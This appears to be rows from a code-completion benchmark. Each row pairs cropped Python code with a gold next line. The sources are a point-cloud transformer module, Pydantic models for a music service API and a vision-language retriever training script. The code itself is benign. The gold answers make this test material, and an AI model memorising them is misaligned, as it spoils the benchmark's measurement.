repo_name | file_path | context | import_statement | token_num | cropped_code | all_code | next_line | gold_snippet_index | created_at | level
---|---|---|---|---|---|---|---|---|---|---|
NOrangeeroli/SecondPose | model/pcd_cross/modules/transformer/lrpe_transformer.py | [
{
"identifier": "build_dropout_layer",
"path": "model/pcd_cross/modules/layers/factory.py",
"snippet": "def build_dropout_layer(p: Optional[float], **kwargs) -> nn.Module:\n r\"\"\"Factory function for dropout layer.\"\"\"\n if p is None or p == 0:\n return nn.Identity()\n else:\n return nn.Dropout(p=p, **kwargs)"
},
{
"identifier": "AttentionOutput",
"path": "model/pcd_cross/modules/transformer/output_layer.py",
"snippet": "class AttentionOutput(nn.Module):\n def __init__(self, d_model, dropout=None, activation_fn='ReLU'):\n super(AttentionOutput, self).__init__()\n self.expand = nn.Linear(d_model, d_model * 2)\n self.activation = build_act_layer(activation_fn)\n self.squeeze = nn.Linear(d_model * 2, d_model)\n self.dropout = build_dropout_layer(dropout)\n self.norm = nn.LayerNorm(d_model)\n\n def forward(self, input_states):\n hidden_states = self.expand(input_states)\n hidden_states = self.activation(hidden_states)\n hidden_states = self.squeeze(hidden_states)\n hidden_states = self.dropout(hidden_states)\n output_states = self.norm(input_states + hidden_states)\n return output_states"
},
{
"identifier": "LearnablePositionalEmbedding",
"path": "model/pcd_cross/modules/transformer/positional_embedding.py",
"snippet": "class LearnablePositionalEmbedding(nn.Module):\n def __init__(self, num_embeddings, embedding_dim, dropout=None):\n super(LearnablePositionalEmbedding, self).__init__()\n self.num_embeddings = num_embeddings\n self.embedding_dim = embedding_dim\n self.embeddings = nn.Embedding(num_embeddings, embedding_dim) # (L, D)\n self.norm = nn.LayerNorm(embedding_dim)\n self.dropout = build_dropout_layer(dropout)\n\n def forward(self, emb_indices):\n r\"\"\"Learnable Positional Embedding.\n\n `emb_indices` are truncated to fit the finite embedding space.\n\n Args:\n emb_indices: torch.LongTensor (*)\n\n Returns:\n embeddings: torch.Tensor (*, D)\n \"\"\"\n input_shape = emb_indices.shape\n emb_indices = emb_indices.view(-1)\n max_emd_indices = torch.full_like(emb_indices, self.num_embeddings - 1)\n emb_indices = torch.minimum(emb_indices, max_emd_indices)\n embeddings = self.embeddings(emb_indices) # (*, D)\n embeddings = self.norm(embeddings)\n embeddings = self.dropout(embeddings)\n embeddings = embeddings.view(*input_shape, self.embedding_dim)\n return embeddings"
}
] | import torch
import torch.nn as nn
import torch.nn.functional as F
from einops import rearrange
from ..layers import build_dropout_layer
from .output_layer import AttentionOutput
from .positional_embedding import LearnablePositionalEmbedding | 1,841 | Relative positional embedding is injected in each multi-head attention layer.
The shape of input tensor should be (B, N, C).
Implemented with `nn.Linear` and `nn.LayerNorm` (with affine).
"""
class LRPEMultiHeadAttention(nn.Module):
def __init__(self, d_model, num_heads, num_embeddings, dropout=None):
super(LRPEMultiHeadAttention, self).__init__()
if d_model % num_heads != 0:
raise ValueError(f'"d_model" ({d_model}) is not divisible by "num_heads" ({num_heads}).')
self.d_model = d_model
self.num_heads = num_heads
self.d_model_per_head = d_model // num_heads
self.num_embeddings = num_embeddings
self.proj_q = nn.Linear(self.d_model, self.d_model)
self.proj_k = nn.Linear(self.d_model, self.d_model)
self.proj_v = nn.Linear(self.d_model, self.d_model)
self.embedding = LearnablePositionalEmbedding(num_embeddings, d_model, dropout=dropout)
self.dropout = build_dropout_layer(dropout)
def transpose_for_scores(self, x):
x = x.view(x.shape[0], x.shape[1], self.num_heads, self.d_model_per_head)
x = x.permute(0, 2, 1, 3)
return x
def get_embeddings(self, q, emb_indices):
emb_all_indices = torch.arange(self.num_embeddings).cuda() # (P,)
emb_bank = rearrange(self.embedding(emb_all_indices), 'p (h c) -> h p c', h=self.num_heads)
attention_scores = torch.einsum('bhnc,hpc->bhnp', q, emb_bank)
emb_indices = emb_indices.unsqueeze(1).expand(-1, self.num_heads, -1, -1) # (B, N, M) -> (B, H, N, M)
attention_scores = torch.gather(attention_scores, dim=-1, index=emb_indices) # (B, H, N, P) -> (B, H, N, M)
return attention_scores
def forward(
self,
input_q,
input_k,
input_v,
emb_indices_qk,
key_masks=None,
attention_factors=None,
):
r"""Scaled Dot-Product Attention with Learnable Relative Positional Embedding (forward)
Args:
input_q: torch.Tensor (B, N, C)
input_k: torch.Tensor (B, M, C)
input_v: torch.Tensor (B, M, C)
emb_indices_qk: torch.Tensor (B, N, M), relative position indices
key_masks: torch.Tensor (B, M), True if ignored, False if preserved
attention_factors: torch.Tensor (B, N, M)
Returns
hidden_states: torch.Tensor (B, N, C)
attention_scores: torch.Tensor (B, H, N, M)
"""
q = rearrange(self.proj_q(input_q), 'b n (h c) -> b h n c', h=self.num_heads)
k = rearrange(self.proj_k(input_k), 'b m (h c) -> b h m c', h=self.num_heads)
v = rearrange(self.proj_v(input_v), 'b m (h c) -> b h m c', h=self.num_heads)
attention_scores_p = self.get_embedding_attention(q, emb_indices_qk)
attention_scores_e = torch.einsum('bhnc,bhmc->bhnm', q, k)
attention_scores = (attention_scores_e + attention_scores_p) / self.d_model_per_head ** 0.5
if attention_factors is not None:
attention_scores = attention_factors.unsqueeze(1) * attention_scores
if key_masks is not None:
attention_scores = attention_scores.masked_fill(key_masks.unsqueeze(1).unsqueeze(1), float('-inf'))
attention_scores = F.softmax(attention_scores, dim=-1)
attention_scores = self.dropout(attention_scores)
hidden_states = torch.matmul(attention_scores, v)
hidden_states = rearrange(hidden_states, 'b h n c -> b n (h c)')
return hidden_states, attention_scores
class LRPEAttentionLayer(nn.Module):
def __init__(self, d_model, num_heads, rpe_size, dropout=None):
super(LRPEAttentionLayer, self).__init__()
self.attention = LRPEMultiHeadAttention(d_model, num_heads, rpe_size, dropout=dropout)
self.linear = nn.Linear(d_model, d_model)
self.dropout = build_dropout_layer(dropout)
self.norm = nn.LayerNorm(d_model)
def forward(
self,
input_states,
memory_states,
position_states,
memory_masks=None,
attention_factors=None,
):
hidden_states, attention_scores = self.attention(
input_states,
memory_states,
memory_states,
position_states,
key_masks=memory_masks,
attention_factors=attention_factors,
)
hidden_states = self.linear(hidden_states)
hidden_states = self.dropout(hidden_states)
output_states = self.norm(hidden_states + input_states)
return output_states, attention_scores
class LRPETransformerLayer(nn.Module):
def __init__(self, d_model, num_heads, rpe_size, dropout=None, activation_fn='ReLU'):
super(LRPETransformerLayer, self).__init__()
self.attention = LRPEAttentionLayer(d_model, num_heads, rpe_size, dropout=dropout)
| r"""Transformer with Learnable Relative Positional Embeddings.
Relative positional embedding is injected in each multi-head attention layer.
The shape of input tensor should be (B, N, C).
Implemented with `nn.Linear` and `nn.LayerNorm` (with affine).
"""
class LRPEMultiHeadAttention(nn.Module):
def __init__(self, d_model, num_heads, num_embeddings, dropout=None):
super(LRPEMultiHeadAttention, self).__init__()
if d_model % num_heads != 0:
raise ValueError(f'"d_model" ({d_model}) is not divisible by "num_heads" ({num_heads}).')
self.d_model = d_model
self.num_heads = num_heads
self.d_model_per_head = d_model // num_heads
self.num_embeddings = num_embeddings
self.proj_q = nn.Linear(self.d_model, self.d_model)
self.proj_k = nn.Linear(self.d_model, self.d_model)
self.proj_v = nn.Linear(self.d_model, self.d_model)
self.embedding = LearnablePositionalEmbedding(num_embeddings, d_model, dropout=dropout)
self.dropout = build_dropout_layer(dropout)
def transpose_for_scores(self, x):
x = x.view(x.shape[0], x.shape[1], self.num_heads, self.d_model_per_head)
x = x.permute(0, 2, 1, 3)
return x
def get_embeddings(self, q, emb_indices):
emb_all_indices = torch.arange(self.num_embeddings).cuda() # (P,)
emb_bank = rearrange(self.embedding(emb_all_indices), 'p (h c) -> h p c', h=self.num_heads)
attention_scores = torch.einsum('bhnc,hpc->bhnp', q, emb_bank)
emb_indices = emb_indices.unsqueeze(1).expand(-1, self.num_heads, -1, -1) # (B, N, M) -> (B, H, N, M)
attention_scores = torch.gather(attention_scores, dim=-1, index=emb_indices) # (B, H, N, P) -> (B, H, N, M)
return attention_scores
def forward(
self,
input_q,
input_k,
input_v,
emb_indices_qk,
key_masks=None,
attention_factors=None,
):
r"""Scaled Dot-Product Attention with Learnable Relative Positional Embedding (forward)
Args:
input_q: torch.Tensor (B, N, C)
input_k: torch.Tensor (B, M, C)
input_v: torch.Tensor (B, M, C)
emb_indices_qk: torch.Tensor (B, N, M), relative position indices
key_masks: torch.Tensor (B, M), True if ignored, False if preserved
attention_factors: torch.Tensor (B, N, M)
Returns
hidden_states: torch.Tensor (B, N, C)
attention_scores: torch.Tensor (B, H, N, M)
"""
q = rearrange(self.proj_q(input_q), 'b n (h c) -> b h n c', h=self.num_heads)
k = rearrange(self.proj_k(input_k), 'b m (h c) -> b h m c', h=self.num_heads)
v = rearrange(self.proj_v(input_v), 'b m (h c) -> b h m c', h=self.num_heads)
attention_scores_p = self.get_embedding_attention(q, emb_indices_qk)
attention_scores_e = torch.einsum('bhnc,bhmc->bhnm', q, k)
attention_scores = (attention_scores_e + attention_scores_p) / self.d_model_per_head ** 0.5
if attention_factors is not None:
attention_scores = attention_factors.unsqueeze(1) * attention_scores
if key_masks is not None:
attention_scores = attention_scores.masked_fill(key_masks.unsqueeze(1).unsqueeze(1), float('-inf'))
attention_scores = F.softmax(attention_scores, dim=-1)
attention_scores = self.dropout(attention_scores)
hidden_states = torch.matmul(attention_scores, v)
hidden_states = rearrange(hidden_states, 'b h n c -> b n (h c)')
return hidden_states, attention_scores
class LRPEAttentionLayer(nn.Module):
def __init__(self, d_model, num_heads, rpe_size, dropout=None):
super(LRPEAttentionLayer, self).__init__()
self.attention = LRPEMultiHeadAttention(d_model, num_heads, rpe_size, dropout=dropout)
self.linear = nn.Linear(d_model, d_model)
self.dropout = build_dropout_layer(dropout)
self.norm = nn.LayerNorm(d_model)
def forward(
self,
input_states,
memory_states,
position_states,
memory_masks=None,
attention_factors=None,
):
hidden_states, attention_scores = self.attention(
input_states,
memory_states,
memory_states,
position_states,
key_masks=memory_masks,
attention_factors=attention_factors,
)
hidden_states = self.linear(hidden_states)
hidden_states = self.dropout(hidden_states)
output_states = self.norm(hidden_states + input_states)
return output_states, attention_scores
class LRPETransformerLayer(nn.Module):
def __init__(self, d_model, num_heads, rpe_size, dropout=None, activation_fn='ReLU'):
super(LRPETransformerLayer, self).__init__()
self.attention = LRPEAttentionLayer(d_model, num_heads, rpe_size, dropout=dropout) | self.output = AttentionOutput(d_model, dropout=dropout, activation_fn=activation_fn) | 1 | 2023-12-16 16:58:33+00:00 | 4k |
KatantDev/YMdantic | ymdantic/models/tracks/track.py | [
{
"identifier": "DeprecatedMixin",
"path": "ymdantic/mixins.py",
"snippet": "class DeprecatedMixin:\n \"\"\"Миксин, удаляющий устаревшие поля из модели.\"\"\"\n\n @model_validator(mode=\"before\")\n def remove_deprecated(cls, obj: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"\n Удаляет устаревшие поля из модели.\n\n :param obj: Словарь с данными модели.\n :return: Словарь с данными модели без устаревших полей.\n \"\"\"\n obj.pop(\"substituted\", None)\n obj.pop(\"deprecation\", None)\n obj.pop(\"decomposed\", None)\n if obj.get(\"version\") is not None:\n obj[\"title\"] += f\" ({obj.get('version')})\"\n obj.pop(\"version\")\n return obj"
},
{
"identifier": "Artist",
"path": "ymdantic/models/artists/artist.py",
"snippet": "class Artist(YMBaseModel, DeprecatedMixin):\n \"\"\"Pydantic модель, представляющая информацию об артисте.\"\"\"\n\n id: int\n # Уникальный идентификатор артиста.\n name: str\n # Имя артиста.\n various: bool\n # Флаг, указывающий, является ли артист группой.\n composer: bool\n # Флаг, указывающий, является ли артист композитором.\n genres: List[str]\n # Жанры треков артиста.\n disclaimers: List[Literal[\"\"]] # TODO: Проверить, что тут может быть.\n # Список отказов от ответственности артиста.\n cover: Optional[Cover] = None\n # Обложка артиста.\n\n @model_validator(mode=\"before\")\n def validate_genres(cls, artist: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"\n Этот метод класса конвертирует жанры в данных об артисте в новый вид.\n\n Он проверяет, присутствует ли ключ 'genre' в словаре альбома. Если\n он присутствует, он присваивает список, содержащий жанр,\n ключу 'genres' словаря альбома. Если ключ 'genre' отсутствует,\n он присваивает пустой список ключу 'genres'.\n\n :param artist: Словарь, содержащий информацию об артисте.\n :return: Словарь, содержащий информацию об артисте с конвертированными\n жанрами.\n \"\"\"\n genre = artist.get(\"genre\")\n artist.pop(\"genre\", None)\n artist[\"genres\"] = [genre] if genre else []\n return artist\n\n def get_cover_image_url(self, size: str = \"200x200\") -> Optional[HttpUrl]:\n \"\"\"\n Возвращает URL изображения обложки артиста с заданным размером.\n\n :param size: Размер изображения.\n :return: URL изображения обложки артиста с заданным размером.\n \"\"\"\n if self.cover is None:\n return None\n return self.cover.get_image_url(size)"
},
{
"identifier": "YMBaseModel",
"path": "ymdantic/models/base.py",
"snippet": "class YMBaseModel(BaseModel, ClientMixin):\n \"\"\"Базовая Pydantic модель для всех будущих моделей.\"\"\"\n\n model_config = ConfigDict(\n alias_generator=to_camel,\n populate_by_name=True,\n extra=\"forbid\",\n )"
},
{
"identifier": "ChartPosition",
"path": "ymdantic/models/chart_position.py",
"snippet": "class ChartPosition(YMBaseModel):\n \"\"\"Pydantic модель, представляющая позицию трека в чарте.\"\"\"\n\n position: int\n # Позиция трека в чарте.\n progress: Literal[\"same\", \"up\", \"down\", \"new\"]\n # Информация о том, как изменилась позиция трека за последнее время.\n listeners: int\n # Количество слушателей трека на прошлой неделе.\n shift: int\n # Количество позиций, на которое изменилась позиция трека за последнее время.\n bg_color: Optional[str] = None\n # Цвет фона позиции трека."
},
{
"identifier": "R128",
"path": "ymdantic/models/tracks/r128.py",
"snippet": "class R128(YMBaseModel):\n \"\"\"\n Pydantic модель, представляющая данные нормализации громкости по стандарту EBU R128.\n\n Стандарт EBU R128 используется для измерения воспринимаемой громкости аудиоконтента.\n \"\"\"\n\n i: float\n # Значение интегрированной громкости в LUFS (единицы громкости\n # относительно полной шкалы). Это общая громкость всего аудиофрагмента.\n tp: float\n # Истинный пиковый уровень в dBTP (децибелы истинного пика).\n # Это самый высокий уровень в аудиоконтенте, учитывающий межсемпловые пики."
},
{
"identifier": "Fade",
"path": "ymdantic/models/tracks/fade.py",
"snippet": "class Fade(YMBaseModel):\n \"\"\"Pydantic модель, представляющая информацию о постепенном переходе в треке.\"\"\"\n\n in_start: float\n # Время в секундах, когда начинается постепенное увеличение громкости.\n in_stop: float\n # Время в секундах, когда заканчивается постепенное увеличение громкости.\n out_start: float\n # Время в секундах, когда начинается постепенное уменьшение громкости.\n out_stop: float\n # Время в секундах, когда заканчивается постепенное уменьшение громкости."
},
{
"identifier": "DerivedColors",
"path": "ymdantic/models/tracks/derived_colors.py",
"snippet": "class DerivedColors(YMBaseModel):\n \"\"\"Pydantic модель, представляющая производные цвета обложки альбома.\"\"\"\n\n average: str\n # Средний цвет обложки в формате HEX.\n wave_text: str\n # Цвет текста волновой формы в формате HEX.\n mini_player: str\n # Цвет мини-плеера в формате HEX.\n accent: str\n # Акцентный цвет в формате HEX."
},
{
"identifier": "TrackAlbum",
"path": "ymdantic/models/tracks/album.py",
"snippet": "class TrackAlbum(BaseAlbum):\n \"\"\"Pydantic модель, представляющая информацию об альбоме с текущим треком.\"\"\"\n\n start_date: Optional[date] = None\n # Дата начала альбома.\n track_position: Optional[TrackPosition] = None\n # Позиция трека в альбоме (если есть)."
},
{
"identifier": "LyricsInfo",
"path": "ymdantic/models/tracks/lyrics_info.py",
"snippet": "class LyricsInfo(YMBaseModel):\n \"\"\"\n Pydantic модель, представляющая информацию о наличии текста песни.\n\n Наличие текста и синхронизированных текстов песни.\n \"\"\"\n\n has_available_sync_lyrics: bool\n # Флаг, указывающий на наличие синхронизированных текстов песни.\n has_available_text_lyrics: bool\n # Флаг, указывающий на наличие текста песни."
},
{
"identifier": "Major",
"path": "ymdantic/models/tracks/major.py",
"snippet": "class Major(YMBaseModel):\n \"\"\"Pydantic модель, представляющая основную информацию о лейбле трека.\"\"\"\n\n id: int\n # Уникальный идентификатор лейбла.\n name: str\n # Название лейбла."
},
{
"identifier": "DownloadInfo",
"path": "ymdantic/models/tracks/download_info.py",
"snippet": "class DownloadInfo(YMBaseModel):\n \"\"\"Pydantic модель, представляющая информацию о скачивании трека.\"\"\"\n\n codec: CodecType\n # Кодек трека. Возможные значения: \"mp3\", \"aac\".\n gain: bool\n # Флаг для нормализации громкости трека (видимо).\n preview: bool\n # Доступно ли предварительное прослушивание трека.\n download_info_url: HttpUrl\n # Ссылка на S3-хранилище с данными для формирования ссылки на скачивание трека.\n direct: bool\n # Является ли ссылка на S3-хранилище прямой ссылкой на скачивание трека.\n bitrate_in_kbps: int\n # Битрейт трека в кбит/с."
},
{
"identifier": "DownloadInfoDirect",
"path": "ymdantic/models/tracks/download_info.py",
"snippet": "class DownloadInfoDirect(DownloadInfo):\n direct_url_info: S3FileUrl\n\n @property\n def direct_url(self) -> HttpUrl:\n \"\"\"\n Генерирует прямой URL для скачивания трека.\n\n Этот метод возвращает URL, сформированный на основе информации о прямом URL,\n хранящейся в атрибуте 'direct_url_info' экземпляра.\n\n :return: Прямой URL для скачивания трека.\n \"\"\"\n return self.direct_url_info.url"
}
] | from typing import List, Optional, Literal
from pydantic import HttpUrl
from ymdantic.mixins import DeprecatedMixin
from ymdantic.models.artists import Artist
from ymdantic.models.base import YMBaseModel
from ymdantic.models.chart_position import ChartPosition
from ymdantic.models.tracks.r128 import R128
from ymdantic.models.tracks.fade import Fade
from ymdantic.models.tracks.derived_colors import DerivedColors
from ymdantic.models.tracks.album import TrackAlbum
from ymdantic.models.tracks.lyrics_info import LyricsInfo
from ymdantic.models.tracks.major import Major
from ymdantic.models.tracks.download_info import DownloadInfo, DownloadInfoDirect | 3,249 |
AvailableForOptions = List[Literal["bookmate"]]
TrackSource = Literal["OWN", "OWN_REPLACED_TO_UGC"]
class BaseTrack(YMBaseModel, DeprecatedMixin):
"""Pydantic модель, представляющая базовую информацию о любом треке."""
type: Literal["music", "asmr", "audiobook", "noise", "fairy-tale"]
# Тип трека.
id: str
# Идентификатор трека. Идентификатор трека - это уникальный
# идентификатор, по которому можно получить трек.
real_id: str
# Реальный идентификатор трека. Заглушка для замещенных треков.
available: bool
# Доступность трека. В данном случае трек недоступен. Это влияет на то,
# можно ли скачать и прослушать трек.
available_for_premium_users: bool
# Доступность трека для премиум пользователей.
available_full_without_permission: bool
# Полная доступность трека без разрешения.
disclaimers: List[Literal["modal"]]
# Список отказов от ответственности трека.
artists: List[Artist]
# Список артистов трека. Может быть пустым.
albums: List[TrackAlbum]
# Список альбомов трека. Может быть пустым.
lyrics_available: bool
# Доступность текста песни. Если текст песни доступен, то можно получить
# текст песни по данным из LyricsInfo.
remember_position: bool
# Запоминать ли позицию трека. В типе "music" зачастую равен False.
# В основном используется для подкастов, комментариев и аудиокниг.
track_source: TrackSource
# Источник трека
major: Optional[Major] = None
# Лейбл трека (если есть)
|
AvailableForOptions = List[Literal["bookmate"]]
TrackSource = Literal["OWN", "OWN_REPLACED_TO_UGC"]
class BaseTrack(YMBaseModel, DeprecatedMixin):
"""Pydantic модель, представляющая базовую информацию о любом треке."""
type: Literal["music", "asmr", "audiobook", "noise", "fairy-tale"]
# Тип трека.
id: str
# Идентификатор трека. Идентификатор трека - это уникальный
# идентификатор, по которому можно получить трек.
real_id: str
# Реальный идентификатор трека. Заглушка для замещенных треков.
available: bool
# Доступность трека. В данном случае трек недоступен. Это влияет на то,
# можно ли скачать и прослушать трек.
available_for_premium_users: bool
# Доступность трека для премиум пользователей.
available_full_without_permission: bool
# Полная доступность трека без разрешения.
disclaimers: List[Literal["modal"]]
# Список отказов от ответственности трека.
artists: List[Artist]
# Список артистов трека. Может быть пустым.
albums: List[TrackAlbum]
# Список альбомов трека. Может быть пустым.
lyrics_available: bool
# Доступность текста песни. Если текст песни доступен, то можно получить
# текст песни по данным из LyricsInfo.
remember_position: bool
# Запоминать ли позицию трека. В типе "music" зачастую равен False.
# В основном используется для подкастов, комментариев и аудиокниг.
track_source: TrackSource
# Источник трека
major: Optional[Major] = None
# Лейбл трека (если есть) | r128: Optional[R128] = None | 4 | 2023-12-21 21:24:10+00:00 | 4k |
MMC-K/multimodal_understanding | training_retriever.py | [
{
"identifier": "DatasetForVLAlign",
"path": "data_utils.py",
"snippet": "class DatasetForVLAlign(Dataset):\n def __init__(\n self,\n file_path: str,\n image_tokenizer: ViTFeatureExtractor,\n text_tokenizer: AutoTokenizer,\n image_root_dir=None,\n text_max_length=512,\n ):\n super().__init__()\n self.file_path = file_path\n self.image_tokenizer = image_tokenizer\n self.text_tokenizer = text_tokenizer\n self.image_root_dir=image_root_dir\n self.text_max_length = text_max_length\n\n logger.info(\"loading dataset...\")\n self.data = json.load(open(file_path, \"r\"))\n logger.info(\"{} examples was loaded.\".format(len(self.data)))\n\n def __getitem__(self, index):\n sample = self.data[index]\n\n path = sample[\"path\"]\n if self.image_root_dir is not None:\n path = os.path.join(self.image_root_dir, path)\n \n description = sample[\"description\"]\n\n image = Image.open(path)\n\n image_feature = self.image_tokenizer(images=image, return_tensors=\"pt\")\n text_feature = self.text_tokenizer(description, return_tensors=\"pt\", truncation=True, max_length=self.text_max_length)\n\n return {\n \"pixel_values\": image_feature[\"pixel_values\"],\n \"input_ids\": text_feature[\"input_ids\"],\n \"attention_mask\": text_feature[\"attention_mask\"],\n }\n\n def __len__(self):\n return len(self.data)\n\n def get_collate_fn(self):\n def collate_fn(samples, pad_id=0):\n if len(samples) == 0:\n return {}\n return {\n \"input_ids\": collate_tokens([s[\"input_ids\"] for s in samples], pad_id),\n \"attention_mask\": collate_tokens([s[\"attention_mask\"] for s in samples], 0),\n \"pixel_values\": default_collate([s[\"pixel_values\"][0] for s in samples])\n }\n return functools.partial(collate_fn, pad_id=self.text_tokenizer.pad_token_id)"
},
{
"identifier": "VisionT5SimpleBiEncoder",
"path": "modeling_encoder.py",
"snippet": "class VisionT5SimpleBiEncoder(BiEncoderBase):\n _ENCODER_TYPE='biencoder'\n\n def __init__(self,\n args=None,\n vision_encoder=None,\n language_encoder=None):\n super(VisionT5SimpleBiEncoder, self).__init__(\n args=args,\n vision_encoder=vision_encoder,\n language_encoder=language_encoder\n )\n\n def load_weight_from_args(self, args):\n self.vision_encoder = ViTModel.from_pretrained(args.vision_model)\n self.language_encoder = T5EncoderSimple.from_pretrained(args.language_model)\n\n @classmethod\n def from_pretrained(cls, *args, **kwargs):\n root_path = args[0]\n \n enc_path_q = os.path.join(root_path, \"vision\")\n args_q = copy.deepcopy(list(args))\n args_q[0] = enc_path_q\n vision_encoder = ViTModel.from_pretrained(*tuple(args_q), **kwargs)\n\n enc_path_k = os.path.join(root_path, \"language\")\n args_k = copy.deepcopy(list(args))\n args_k[0] = enc_path_k\n language_encoder = T5EncoderSimple.from_pretrained(*tuple(args_k), **kwargs)\n\n return cls(vision_encoder=vision_encoder, language_encoder=language_encoder)"
},
{
"identifier": "VisionT5MeanBiEncoder",
"path": "modeling_encoder.py",
"snippet": "class VisionT5MeanBiEncoder(BiEncoderBase):\n _ENCODER_TYPE='biencoder'\n\n def __init__(self,\n args=None,\n vision_encoder=None,\n language_encoder=None):\n super(VisionT5MeanBiEncoder, self).__init__(\n args=args,\n vision_encoder=vision_encoder,\n language_encoder=language_encoder\n )\n\n def load_weight_from_args(self, args):\n self.vision_encoder = ViTModel.from_pretrained(args.vision_model)\n self.language_encoder = T5EncoderMean.from_pretrained(args.language_model)\n\n @classmethod\n def from_pretrained(cls, *args, **kwargs):\n root_path = args[0]\n \n enc_path_q = os.path.join(root_path, \"vision\")\n args_q = copy.deepcopy(list(args))\n args_q[0] = enc_path_q\n vision_encoder = ViTModel.from_pretrained(*tuple(args_q), **kwargs)\n\n enc_path_k = os.path.join(root_path, \"language\")\n args_k = copy.deepcopy(list(args))\n args_k[0] = enc_path_k\n language_encoder = T5EncoderMean.from_pretrained(*tuple(args_k), **kwargs)\n\n return cls(vision_encoder=vision_encoder, language_encoder=language_encoder)"
},
{
"identifier": "VisionT5SimpleBiEncoderHN",
"path": "modeling_encoder.py",
"snippet": "class VisionT5SimpleBiEncoderHN(BiEncoderBaseHN):\n _ENCODER_TYPE='biencoder'\n\n def __init__(self,\n args=None,\n vision_encoder=None,\n language_encoder=None):\n super(VisionT5SimpleBiEncoderHN, self).__init__(\n args=args,\n vision_encoder=vision_encoder,\n language_encoder=language_encoder\n )\n\n def load_weight_from_args(self, args):\n self.vision_encoder = ViTModel.from_pretrained(args.vision_model)\n self.language_encoder = T5EncoderSimple.from_pretrained(args.language_model)\n\n @classmethod\n def from_pretrained(cls, *args, **kwargs):\n root_path = args[0]\n \n enc_path_q = os.path.join(root_path, \"vision\")\n args_q = copy.deepcopy(list(args))\n args_q[0] = enc_path_q\n vision_encoder = ViTModel.from_pretrained(*tuple(args_q), **kwargs)\n\n enc_path_k = os.path.join(root_path, \"language\")\n args_k = copy.deepcopy(list(args))\n args_k[0] = enc_path_k\n language_encoder = T5EncoderSimple.from_pretrained(*tuple(args_k), **kwargs)\n\n return cls(vision_encoder=vision_encoder, language_encoder=language_encoder)"
},
{
"identifier": "VisionT5MeanBiEncoderHN",
"path": "modeling_encoder.py",
"snippet": "class VisionT5MeanBiEncoderHN(BiEncoderBaseHN):\n _ENCODER_TYPE='biencoder'\n\n def __init__(self,\n args=None,\n vision_encoder=None,\n language_encoder=None):\n super(VisionT5MeanBiEncoderHN, self).__init__(\n args=args,\n vision_encoder=vision_encoder,\n language_encoder=language_encoder\n )\n\n def load_weight_from_args(self, args):\n self.vision_encoder = ViTModel.from_pretrained(args.vision_model)\n self.language_encoder = T5EncoderMean.from_pretrained(args.language_model)\n\n @classmethod\n def from_pretrained(cls, *args, **kwargs):\n root_path = args[0]\n \n enc_path_q = os.path.join(root_path, \"vision\")\n args_q = copy.deepcopy(list(args))\n args_q[0] = enc_path_q\n vision_encoder = ViTModel.from_pretrained(*tuple(args_q), **kwargs)\n\n enc_path_k = os.path.join(root_path, \"language\")\n args_k = copy.deepcopy(list(args))\n args_k[0] = enc_path_k\n language_encoder = T5EncoderMean.from_pretrained(*tuple(args_k), **kwargs)\n\n return cls(vision_encoder=vision_encoder, language_encoder=language_encoder)"
}
] | import argparse
import os
import gc
import time
import json
import shutil
import logging
import functools
import numpy as np
import torch
import torch.nn.functional as F
import torch.distributed as dist
import torch.utils.data
import torch.utils.data.distributed
import torch.nn.parallel
from tqdm import tqdm
from torch.utils.data import DataLoader
from torch.nn import CrossEntropyLoss
from torch import optim
from torch.nn.parallel import DistributedDataParallel as DDP
from transformers import AutoTokenizer, ViTFeatureExtractor
from torch.utils.tensorboard import SummaryWriter
from data_utils import DatasetForVLAlign
from modeling_encoder import (
VisionT5SimpleBiEncoder,
VisionT5MeanBiEncoder,
VisionT5SimpleBiEncoderHN,
VisionT5MeanBiEncoderHN,
) | 3,363 | batch_size = language_repr.size(0)
# blocking call (all_gather)
with torch.no_grad():
language_repr_gathered = all_gather(language_repr, args)
vision_repr_gathered = all_gather(vision_repr, args)
# language_repr_gathered, vision_repr_gathered - [world_size, batch_size, model_dim]
language_repr_gathered[args.rank] = language_repr
vision_repr_gathered[args.rank] = vision_repr
language_repr_cat = torch.cat(language_repr_gathered, dim=0)
vision_repr_cat = torch.cat(vision_repr_gathered, dim=0)
# language_repr_cat, vision_repr_cat - [batch_size*world_size, model_dim]
scores = torch.mm(language_repr_cat, vision_repr_cat.t())
target = torch.arange(batch_size * args.world_size).to(language_repr.device)
retrieve_loss = loss_fn(scores, target)
return retrieve_loss
def retrieval_eval(model, batch):
outputs = model(batch)
# outputs: language_repr, vision_repr- [batch_size, model_dim]
batch_size = outputs["language_repr"].size(0)
scores = torch.mm(outputs["language_repr"], outputs["vision_repr"].t())
target = torch.arange(batch_size).to(outputs["language_repr"].device)
# scores: [batch_size, batch_size]
ranked = scores.argsort(dim=1, descending=True)
# [[0.1, 0.3, -0.2, 0.14 ]] -> [[1, 3, 0, 2]] (index of score - descending order)
idx2ranked_t = ranked.argsort(dim=1)
# [[1, 3, 0, 2]] -> [[2, 0, 3, 1]] (index to rank)
rrs = []
for t, idx2ranked in zip(target, idx2ranked_t):
rrs.append(1 / (idx2ranked[t].item() + 1))
# reciprocal rank for 1st, 2nd hop
return {
"mrr": torch.tensor(np.mean(rrs)).to(outputs["language_repr"].device)
}
def create_dir_if_not_exist(path):
if not os.path.isdir(path):
os.makedirs(path, exist_ok=True)
def create_directory_info(args, create_dir=True):
model_dir = os.path.join(args.output_dir, "{}-{}-{}".format(
args.model_cls.replace('/', '_'),
args.vision_model.replace('/', '_'),
args.language_model.replace('/', '_')))
if args.dir_suffix is not None:
model_dir = '_'.join([model_dir, args.dir_suffix])
weights_dir = os.path.join(model_dir, "weights")
logs_dir = os.path.join(model_dir, "logs")
path_info = {
'model_dir': model_dir,
'weights_dir': weights_dir,
'logs_dir': logs_dir,
}
if create_dir:
for k, v in path_info.items():
create_dir_if_not_exist(v)
path_info['best_model_path'] = os.path.join(weights_dir, "best_model.pth")
path_info['ckpt_path'] = os.path.join(weights_dir, "checkpoint.pth")
return path_info
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def save_checkpoint(state, is_best, filename='checkpoint.pth', best_filename='model_best.pth'):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, best_filename)
def get_env_var(env_var, type_cls, default_val):
if env_var in os.environ:
return type_cls(os.environ[env_var])
return default_val
MODEL_CLS = {
"VisionT5SimpleBiEncoder": {
"model_cls": VisionT5SimpleBiEncoder,
},
"VisionT5MeanBiEncoder": {
